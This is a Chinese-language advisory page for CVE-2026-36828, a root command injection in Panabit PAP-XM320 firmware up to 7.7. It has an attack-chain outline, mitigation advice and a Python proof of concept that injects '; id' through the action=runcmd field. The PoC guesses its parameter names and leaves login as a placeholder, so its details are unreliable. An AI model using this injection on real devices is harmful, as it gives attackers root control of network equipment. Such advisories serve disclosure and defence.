CVE-2026-36828 CVSS 8.8 高危

CVE-2026-36828 Panabit PAP-XM320 命令注入漏洞

披露日期: 2026-05-19

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-36828

漏洞类型

命令注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Panabit PAP-XM320

漏洞概述

Panabit PAP-XM320设备在7.7及以下版本中存在严重的命令注入漏洞。该漏洞位于/cgi-bin/tools/ajax_cmd接口处，由于CGI组件对用户输入缺乏严格的过滤，导致经过身份验证的低权限用户可以通过action=runcmd参数注入并执行任意Shell命令。由于程序以Root权限运行，攻击者可完全控制受影响系统，造成敏感信息泄露、数据篡改或服务中断，风险极高。

技术细节

该漏洞的根源在于Panabit PAP-XM320固件中的/cgi-bin/tools/ajax_cmd CGI脚本未正确处理用户提供的参数。具体来说，当攻击者向该端点发送请求时，可以通过构造恶意的action=runcmd参数，将特定的Shell命令拼接到底层系统调用函数中（如system()或popen()）。由于CGI程序通常以最高权限（Root）运行在Linux系统后台，任何通过此接口注入的命令都将继承Root权限。攻击者只需具备低权限账户即可利用此漏洞，无需复杂的用户交互即可通过网络发起攻击。成功利用后，攻击者可以读取任意文件、安装后门、修改系统配置或停止服务，从而完全接管设备。

攻击链分析

STEP 1

侦察

攻击者识别网络中的Panabit PAP-XM320设备，确定其版本是否在7.7及以下。

STEP 2

获取凭证

攻击者通过弱口令猜测、钓鱼或其他手段获取一个低权限的合法账户凭证。

STEP 3

漏洞利用

攻击者使用获取的凭证登录设备，向/cgi-bin/tools/ajax_cmd接口发送包含恶意Shell命令的请求，利用action=runcmd参数进行注入。

STEP 4

权限提升与控制

由于CGI以Root权限运行，注入的命令成功执行，攻击者获得Root Shell，完全控制设备。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_host = "http://192.168.1.1"
vulnerable_url = f"{target_host}/cgi-bin/tools/ajax_cmd"

# Attacker credentials (low privilege required)
username = "user"
password = "password"

# Establish a session
session = requests.Session()

# 1. Authentication (Placeholder for actual login logic)
# login_data = {"username": username, "password": password}
# session.post(f"{target_host}/login", data=login_data)

# 2. Exploit Command Injection
# The vulnerability exists in the 'action=runcmd' parameter.
# We inject a command to execute 'id' to verify root privileges.
payload = "; id" # Command injection separator

# Construct the request parameters
# Assuming the command is passed in a parameter like 'cmd' or similar
# or injected directly into the action parameter depending on implementation.
# Here we simulate a typical POST request structure.
data = {
    "action": "runcmd",
    "cmd": f"ls -la {payload}" # Injecting payload into the command field
}

try:
    response = session.post(vulnerable_url, data=data, timeout=10)
    
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Response content:")
        print(response.text)
        
        # Check if command execution evidence exists in response
        if "uid=0(root)" in response.text or "gid=0(root)" in response.text:
            print("[!] Command Injection Confirmed: Root privileges detected.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

Panabit PAP-XM320 <= 7.7

防御指南

临时缓解措施

建议立即升级至官方修复版本。若无法立即升级，请严格限制网络访问，仅允许受信任的IP地址访问设备管理后台，并关闭非必要的CGI接口服务。同时，应加强对低权限账户的审计与监控，及时发现异常行为。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表